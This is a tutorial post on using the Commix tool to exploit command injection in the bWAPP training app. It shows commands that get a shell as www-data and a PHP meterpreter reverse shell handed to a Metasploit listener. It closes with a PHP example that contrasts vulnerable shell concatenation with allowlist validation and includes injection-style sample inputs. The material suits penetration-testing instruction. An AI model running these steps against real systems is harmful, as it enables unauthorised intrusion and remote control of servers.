
PHP Command Injection Vulnerability Techniques: Kali Linux Penetration Testing Tools (8), System Command Injection Vulnerability Tool: Commix Usage

Guest 2024-12-09


4. How is Commix used?

The request-specific values, such as the Cookie, can be obtained with the browser's developer tools or a third-party tool.

~# commix --url "http://127.0.0.1/bWAPP/commandi.php" --cookie="acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=mq78064h3p2b00n4toerk7ana1; security_level=0" --data="target=www.nsa.gov&form=submit"


When asked whether you want a shell, enter Y to get one.


[?] Do you want a Pseudo-Terminal shell? [Y/n] > y

Pseudo-Terminal (type '?' for available options)

commix(os_shell) >

The shell is obtained:

commix(os_shell) > pwd

/owaspbwa/bwapp-git/bWAPP

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > ls -ll

A reverse shell can then be set up and combined with Metasploit for internal network penetration.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.120.101 # (the msf machine)

LHOST => 192.168.120.101

commix(reverse_tcp) > set LPORT 4444

LPORT => 4444

---[ Reverse TCP shells ]---

Type '1' to use a netcat reverse TCP shell.

Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

---[ Unix-like reverse TCP shells ]---

Type '1' to use a PHP reverse TCP shell.

Type '2' to use a Perl reverse TCP shell.

Type '3' to use a Ruby reverse TCP shell.

Type '4' to use a Python reverse TCP shell.

Type '5' to use a Socat reverse TCP shell.

Type '6' to use a Bash reverse TCP shell.

Type '7' to use a Ncat reverse TCP shell.

---[ Meterpreter reverse TCP shells ]---

Type '8' to use a PHP meterpreter reverse TCP shell.

Type '9' to use a Python meterpreter reverse TCP shell.

Type '10' to use a Windows meterpreter reverse TCP shell.

Type '11' to use the web delivery script.

commix(reverse_tcp_other) > 8

[*] Generating the 'php/meterpreter/reverse_tcp' payload... [ SUCCEED ]

[*] Type "msfconsole -r /usr/share/commix/php_meterpreter.rc" (in a new window). # copy this and start msf

[*] Once the loading is done, press here any key to continue... # press Enter, and the reverse shell is received in msf

[+] Everything is in place, cross your fingers and wait for a shell!

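Summary of using Commix:

1. Open http://127.0.0.1/bWAPP/commandi.php in a browser.

2. Submit the form data and capture the url, cookie and data values with a packet capture tool.

3. Point the commix tool at the link and enter the back end.

commix --url "http://127.0.0.1/bWAPP/commandi.php" --data="target=www.nsa.gov&form=submit" --cookie "+++++++"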
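
Seen from the defender's side, the request above delivers the `target` form field to a handler that places it in a lookup command. The following is an added example, not code from the original page or from bWAPP; it assumes the handler runs `nslookup` on `target`, and all function names are hypothetical. It shows the injectable pattern beside a hardened one.

```php
<?php
// Added example, not bWAPP's source. Assumption: the handler runs nslookup on
// the POSTed "target" field. All function names here are hypothetical.

// Vulnerable pattern: input is concatenated into a string that /bin/sh parses,
// so shell metacharacters in $target become part of the command line.
function lookup_vulnerable(string $target): string
{
    return (string) shell_exec('nslookup ' . $target);
}

// Allowlist grammar for a DNS hostname: labels of 1-63 letters, digits or
// hyphens, never starting or ending with a hyphen, at most 253 bytes in all.
// \A and \z are used because "$" would also accept a trailing newline.
function is_valid_hostname(string $target): bool
{
    if (strlen($target) > 253) {
        return false;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/i', $target) === 1;
}

// Hardened pattern: reject anything outside the grammar, then start the
// program from an argument array (PHP >= 7.4), which bypasses the shell.
function lookup_hardened(string $target): ?string
{
    if (!is_valid_hostname($target)) {
        return null; // reject; do not try to strip "bad" characters
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open(['nslookup', $target], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out === false ? null : $out;
}

// Constructed sample inputs: only the first should be accepted.
$samples = ['www.nsa.gov', 'www.nsa.gov;id', "www.nsa.gov\n", '-debug', 'a b'];
foreach ($samples as $t) {
    printf("%-18s %s\n", json_encode($t), is_valid_hostname($t) ? 'accept' : 'reject');
}
```

Because every label must start with a letter or digit, a value beginning with `-` is also rejected, so the input cannot be read by `nslookup` as an option.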
